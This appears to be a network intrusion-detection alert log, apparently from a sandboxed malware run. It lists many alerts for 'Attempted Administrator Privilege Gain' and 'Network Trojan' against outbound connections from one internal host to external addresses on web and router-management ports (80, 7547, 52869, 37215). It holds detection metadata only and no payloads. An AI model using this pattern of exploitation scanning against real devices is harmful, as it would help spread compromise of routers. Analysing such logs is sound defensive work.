            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.100.200.18636474802027121 10/23/22-17:57:10.331694
            SID:2027121
            Source Port:36474
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2323.193.128.3349350802841623 10/23/22-17:56:49.229770
            SID:2841623
            Source Port:49350
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23200.220.171.25341570802846380 10/23/22-17:57:10.820527
            SID:2846380
            Source Port:41570
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2354.230.173.5636476802835222 10/23/22-17:58:09.999286
            SID:2835222
            Source Port:36476
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2385.214.95.21554314802846457 10/23/22-17:57:41.195866
            SID:2846457
            Source Port:54314
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.210.90.11445722802846380 10/23/22-17:57:09.503409
            SID:2846380
            Source Port:45722
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2346.41.136.6246606802846457 10/23/22-17:58:15.376062
            SID:2846457
            Source Port:46606
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2370.113.78.685271875472835222 10/23/22-17:58:32.174734
            SID:2835222
            Source Port:52718
            Destination Port:7547
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2389.42.3.13753896802846457 10/23/22-17:57:43.768106
            SID:2846457
            Source Port:53896
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2382.153.163.1450456802846380 10/23/22-17:57:46.325359
            SID:2846380
            Source Port:50456
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23171.22.122.18454146802846457 10/23/22-17:58:05.418255
            SID:2846457
            Source Port:54146
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.101.250.18839978802027121 10/23/22-17:58:30.353286
            SID:2027121
            Source Port:39978
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2337.46.128.2343696802846457 10/23/22-17:57:07.142795
            SID:2846457
            Source Port:43696
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2354.191.47.17559730802835221 10/23/22-17:57:16.701947
            SID:2835221
            Source Port:59730
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.99.120.1539654802027121 10/23/22-17:57:47.238003
            SID:2027121
            Source Port:39654
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23164.92.217.19851764802846457 10/23/22-17:57:22.271354
            SID:2846457
            Source Port:51764
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23197.166.232.18859668802841623 10/23/22-17:57:31.340270
            SID:2841623
            Source Port:59668
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2380.15.175.23437408802846380 10/23/22-17:58:33.165130
            SID:2846380
            Source Port:37408
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23181.63.252.4955986802846380 10/23/22-17:57:25.717989
            SID:2846380
            Source Port:55986
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23122.169.123.19839822802846457 10/23/22-17:58:19.981464
            SID:2846457
            Source Port:39822
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2368.189.6.13160716802841623 10/23/22-17:57:20.274209
            SID:2841623
            Source Port:60716
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.187.9.17560492802846457 10/23/22-17:58:37.521293
            SID:2846457
            Source Port:60492
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.154.54.23552386802027121 10/23/22-17:58:24.024329
            SID:2027121
            Source Port:52386
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23178.248.200.11833196802846380 10/23/22-17:57:27.971033
            SID:2846380
            Source Port:33196
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2380.65.132.1451578802846457 10/23/22-17:56:52.713648
            SID:2846457
            Source Port:51578
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2379.118.143.15746958802841623 10/23/22-17:57:07.465546
            SID:2841623
            Source Port:46958
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23115.4.50.1094105875472023548 10/23/22-17:58:11.553647
            SID:2023548
            Source Port:41058
            Destination Port:7547
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.64.163.14635030802027121 10/23/22-17:58:39.775240
            SID:2027121
            Source Port:35030
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2361.81.33.17657902802846457 10/23/22-17:57:50.873042
            SID:2846457
            Source Port:57902
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23112.157.27.21756278802027121 10/23/22-17:56:58.625319
            SID:2027121
            Source Port:56278
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.221.45.13449558802027121 10/23/22-17:57:54.686419
            SID:2027121
            Source Port:49558
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23171.246.92.15653954802846457 10/23/22-17:57:59.896744
            SID:2846457
            Source Port:53954
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2337.9.170.2358306802846457 10/23/22-17:58:30.779303
            SID:2846457
            Source Port:58306
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2359.15.77.14043758802841623 10/23/22-17:57:46.952347
            SID:2841623
            Source Port:43758
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.160.28.4750608802027121 10/23/22-17:57:49.332978
            SID:2027121
            Source Port:50608
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23112.78.145.2044074802027121 10/23/22-17:57:52.074257
            SID:2027121
            Source Port:44074
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23178.18.254.24256138802846380 10/23/22-17:58:13.484636
            SID:2846380
            Source Port:56138
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.101.17.19140598802027121 10/23/22-17:58:15.238586
            SID:2027121
            Source Port:40598
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.49.133.2656320802027121 10/23/22-17:57:49.411882
            SID:2027121
            Source Port:56320
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.198.103.3737196802027121 10/23/22-17:57:59.936405
            SID:2027121
            Source Port:37196
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23195.248.230.16747200802846457 10/23/22-17:58:10.247905
            SID:2846457
            Source Port:47200
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.238.111.2444668802846380 10/23/22-17:56:55.329778
            SID:2846380
            Source Port:44668
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23200.14.249.4941990802846380 10/23/22-17:57:30.763337
            SID:2846380
            Source Port:41990
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.168.169.6834968802846380 10/23/22-17:57:49.441257
            SID:2846380
            Source Port:34968
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.128.118.15559414802846380 10/23/22-17:58:13.284338
            SID:2846380
            Source Port:59414
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23169.63.9.1952010802846380 10/23/22-17:57:51.921388
            SID:2846380
            Source Port:52010
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.5.195.19849048802846380 10/23/22-17:58:27.265332
            SID:2846380
            Source Port:49048
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.179.138.11441822802027121 10/23/22-17:58:39.654913
            SID:2027121
            Source Port:41822
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23112.213.104.16254618802027121 10/23/22-17:56:58.145092
            SID:2027121
            Source Port:54618
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2346.17.90.20938618802846457 10/23/22-17:58:23.982381
            SID:2846457
            Source Port:38618
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2380.133.216.19254796802846457 10/23/22-17:57:09.746379
            SID:2846457
            Source Port:54796
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23200.69.83.2546712802846380 10/23/22-17:57:10.777301
            SID:2846380
            Source Port:46712
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.232.18.131.2739184802846457 10/23/22-17:57:28.760820
            SID:2846457
            Source Port:39184
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.232.23.233.12834330802846457 10/23/22-17:57:50.460824
            SID:2846457
            Source Port:34330
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.216.56.11039588802846457 10/23/22-17:58:32.885864
            SID:2846457
            Source Port:39588
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23206.210.193.12045094802846380 10/23/22-17:56:42.730580
            SID:2846380
            Source Port:45094
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23164.46.51.4450958802846457 10/23/22-17:57:22.519455
            SID:2846457
            Source Port:50958
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23206.53.53.12558760802846380 10/23/22-17:57:18.550207
            SID:2846380
            Source Port:58760
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23206.132.162.9647928802846380 10/23/22-17:57:29.591792
            SID:2846380
            Source Port:47928
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.176.77.16648620802846380 10/23/22-17:57:48.649938
            SID:2846380
            Source Port:48620
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.179.157.11535814802846380 10/23/22-17:56:49.742825
            SID:2846380
            Source Port:35814
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23195.245.94.248014802846457 10/23/22-17:56:59.497510
            SID:2846457
            Source Port:48014
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.211.124.23238618802027121 10/23/22-17:58:12.704449
            SID:2027121
            Source Port:38618
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23181.179.9.2658978802846380 10/23/22-17:57:11.050832
            SID:2846380
            Source Port:58978
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2354.246.138.24149212802841623 10/23/22-17:57:01.124424
            SID:2841623
            Source Port:49212
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.9.192.9736082802027121 10/23/22-17:57:18.779936
            SID:2027121
            Source Port:36082
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2373.81.42.10756262802835221 10/23/22-17:57:07.567330
            SID:2835221
            Source Port:56262
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.235.62.37.24154114528692027339 10/23/22-17:57:35.315658
            SID:2027339
            Source Port:54114
            Destination Port:52869
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2346.163.116.11733516802846457 10/23/22-17:58:05.437481
            SID:2846457
            Source Port:33516
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23195.77.90.7136918802846457 10/23/22-17:58:10.259964
            SID:2846457
            Source Port:36918
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2380.35.114.10035590802846380 10/23/22-17:58:39.170650
            SID:2846380
            Source Port:35590
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.57.247.18557314802027121 10/23/22-17:58:30.485137
            SID:2027121
            Source Port:57314
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23188.128.215.24939722802846457 10/23/22-17:58:20.013954
            SID:2846457
            Source Port:39722
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.17.71.17257648802846457 10/23/22-17:58:26.388542
            SID:2846457
            Source Port:57648
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23181.16.81.25056470802846380 10/23/22-17:58:01.159339
            SID:2846380
            Source Port:56470
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.253.43.841114802846380 10/23/22-17:56:49.749313
            SID:2846380
            Source Port:41114
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.104.78.16755758802027121 10/23/22-17:57:16.207806
            SID:2027121
            Source Port:55758
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23112.125.24.1042126802027121 10/23/22-17:56:41.451147
            SID:2027121
            Source Port:42126
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23112.126.102.936552802027121 10/23/22-17:57:13.597701
            SID:2027121
            Source Port:36552
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2389.41.36.6638442802846457 10/23/22-17:57:55.937842
            SID:2846457
            Source Port:38442
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23156.229.211.22939640802841623 10/23/22-17:57:28.747625
            SID:2841623
            Source Port:39640
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.21.51.1237278802027121 10/23/22-17:57:54.640088
            SID:2027121
            Source Port:37278
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.232.22.209.12749412802846457 10/23/22-17:57:28.764796
            SID:2846457
            Source Port:49412
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.34.101.12544730528692027339 10/23/22-17:58:32.637804
            SID:2027339
            Source Port:44730
            Destination Port:52869
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.216.190.3735464802027121 10/23/22-17:57:40.690837
            SID:2027121
            Source Port:35464
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2376.189.158.124318475472835222 10/23/22-17:56:43.260935
            SID:2835222
            Source Port:43184
            Destination Port:7547
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.214.236.15950970802027121 10/23/22-17:58:09.669602
            SID:2027121
            Source Port:50970
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23156.254.33.21347714372152835222 10/23/22-17:57:33.283503
            SID:2835222
            Source Port:47714
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2380.97.209.15542736802846457 10/23/22-17:56:52.724553
            SID:2846457
            Source Port:42736
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.110.132.22442506802027121 10/23/22-17:58:17.323566
            SID:2027121
            Source Port:42506
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.235.129.79.15141336802846457 10/23/22-17:57:02.981519
            SID:2846457
            Source Port:41336
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.122.235.22055728802846380 10/23/22-17:57:37.879771
            SID:2846380
            Source Port:55728
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.47.161.5443576802027121 10/23/22-17:57:40.726655
            SID:2027121
            Source Port:43576
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.110.146.15549046802027121 10/23/22-17:57:13.006374
            SID:2027121
            Source Port:49046
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2386.120.46.3241330802846380 10/23/22-17:57:46.317663
            SID:2846380
            Source Port:41330
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2361.223.228.1947372802846457 10/23/22-17:57:02.974325
            SID:2846457
            Source Port:47372
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.221.123.4240218802027121 10/23/22-17:57:05.124614
            SID:2027121
            Source Port:40218
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2372.175.60.255497075472023548 10/23/22-17:58:01.495700
            SID:2023548
            Source Port:54970
            Destination Port:7547
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.86.81.23039304802027121 10/23/22-17:57:40.754801
            SID:2027121
            Source Port:39304
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.195.113.21636696802027121 10/23/22-17:58:36.715213
            SID:2027121
            Source Port:36696
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.86.86.12932892802027121 10/23/22-17:57:21.071511
            SID:2027121
            Source Port:32892
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.221.190.755442802027121 10/23/22-17:58:35.001203
            SID:2027121
            Source Port:55442
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2384.19.173.16452130802841623 10/23/22-17:58:35.828320
            SID:2841623
            Source Port:52130
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2361.157.227.3253898802846457 10/23/22-17:57:51.829174
            SID:2846457
            Source Port:53898
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.175.227.11533898802846457 10/23/22-17:57:58.585196
            SID:2846457
            Source Port:33898
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23112.185.198.7835882802027121 10/23/22-17:57:16.120365
            SID:2027121
            Source Port:35882
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.68.60.3144362802027121 10/23/22-17:57:33.458947
            SID:2027121
            Source Port:44362
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23156.93.225.1635137080802841623 10/23/22-17:57:35.398558
            SID:2841623
            Source Port:51370
            Destination Port:8080
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.110.80.7851942802027121 10/23/22-17:58:05.258423
            SID:2027121
            Source Port:51942
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.101.60.17445282802027121 10/23/22-17:57:25.949040
            SID:2027121
            Source Port:45282
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.235.226.55.11847426802846457 10/23/22-17:57:35.571414
            SID:2846457
            Source Port:47426
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2386.63.13.745496802841623 10/23/22-17:58:07.360550
            SID:2841623
            Source Port:45496
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2343.201.77.22151390802835222 10/23/22-17:57:40.767021
            SID:2835222
            Source Port:51390
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.235.149.76.19236388802846457 10/23/22-17:57:53.339207
            SID:2846457
            Source Port:36388
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.144.28.11238098802846457 10/23/22-17:57:07.073238
            SID:2846457
            Source Port:38098
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2374.43.220.2147056802841623 10/23/22-17:58:29.395457
            SID:2841623
            Source Port:47056
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.116.21.10252816802027121 10/23/22-17:58:02.095305
            SID:2027121
            Source Port:52816
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.213.249.17045378802027121 10/23/22-17:58:12.741202
            SID:2027121
            Source Port:45378
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.67.7.5337986802027121 10/23/22-17:56:46.636448
            SID:2027121
            Source Port:37986
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.235.105.57.20258076802846457 10/23/22-17:57:08.378861
            SID:2846457
            Source Port:58076
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.128.243.4659808802846457 10/23/22-17:58:17.750753
            SID:2846457
            Source Port:59808
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.214.109.3938846802846457 10/23/22-17:57:41.196003
            SID:2846457
            Source Port:38846
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2334.76.74.10445154802841623 10/23/22-17:56:47.921557
            SID:2841623
            Source Port:45154
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.13.150.20337756802846457 10/23/22-17:57:00.159868
            SID:2846457
            Source Port:37756
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23206.225.84.859490802846380 10/23/22-17:56:42.702800
            SID:2846380
            Source Port:59490
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.208.9.19442766802027121 10/23/22-17:58:05.157441
            SID:2027121
            Source Port:42766
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.232.21.197.24232876802846457 10/23/22-17:57:28.770787
            SID:2846457
            Source Port:32876
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2349.12.56.7033412802835221 10/23/22-17:57:28.381541
            SID:2835221
            Source Port:33412
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2378.47.192.10360316802846457 10/23/22-17:58:04.228008
            SID:2846457
            Source Port:60316
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.215.90.12850370802846457 10/23/22-17:58:26.393408
            SID:2846457
            Source Port:50370
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23156.248.215.11237904802841623 10/23/22-17:58:28.035223
            SID:2841623
            Source Port:37904
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23112.46.0.652104802027121 10/23/22-17:58:25.786507
            SID:2027121
            Source Port:52104
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23122.237.29.8151688528692027339 10/23/22-17:58:36.308014
            SID:2027339
            Source Port:51688
            Destination Port:52869
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.110.147.13855308802027121 10/23/22-17:57:23.576634
            SID:2027121
            Source Port:55308
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.235.196.166.9839950802846457 10/23/22-17:57:46.216184
            SID:2846457
            Source Port:39950
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23181.29.230.6855272802846380 10/23/22-17:58:01.160846
            SID:2846380
            Source Port:55272
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.24.191.22143600802846457 10/23/22-17:57:00.293101
            SID:2846457
            Source Port:43600
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2352.51.101.18956142802835221 10/23/22-17:57:11.020124
            SID:2835221
            Source Port:56142
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2361.252.173.7559392802846457 10/23/22-17:57:31.817606
            SID:2846457
            Source Port:59392
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.185.250.9650978802846457 10/23/22-17:57:55.919282
            SID:2846457
            Source Port:50978
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23200.0.201.16533330802846380 10/23/22-17:57:57.993380
            SID:2846380
            Source Port:33330
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2334.144.235.1436336802835222 10/23/22-17:56:43.281124
            SID:2835222
            Source Port:36336
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23112.49.20.14056360802027121 10/23/22-17:58:29.890240
            SID:2027121
            Source Port:56360
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23181.215.47.19352410802846380 10/23/22-17:57:10.928117
            SID:2846380
            Source Port:52410
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.235.190.33.12651294802846457 10/23/22-17:57:53.509841
            SID:2846457
            Source Port:51294
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.249.64.20659430802027121 10/23/22-17:58:36.349679
            SID:2027121
            Source Port:59430
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23200.42.93.8837380802846380 10/23/22-17:57:14.205877
            SID:2846380
            Source Port:37380
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.68.143.18545160802027121 10/23/22-17:58:12.838810
            SID:2027121
            Source Port:45160
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2318.203.114.12335412802835221 10/23/22-17:56:48.003722
            SID:2835221
            Source Port:35412
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2378.129.191.7156902802835222 10/23/22-17:57:58.552595
            SID:2835222
            Source Port:56902
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.148.91.8754784802027121 10/23/22-17:57:05.159450
            SID:2027121
            Source Port:54784
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.99.40.6736714802027121 10/23/22-17:58:32.657829
            SID:2027121
            Source Port:36714
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23112.80.248.4648880802027121 10/23/22-17:57:10.269344
            SID:2027121
            Source Port:48880
            Destination Port:80
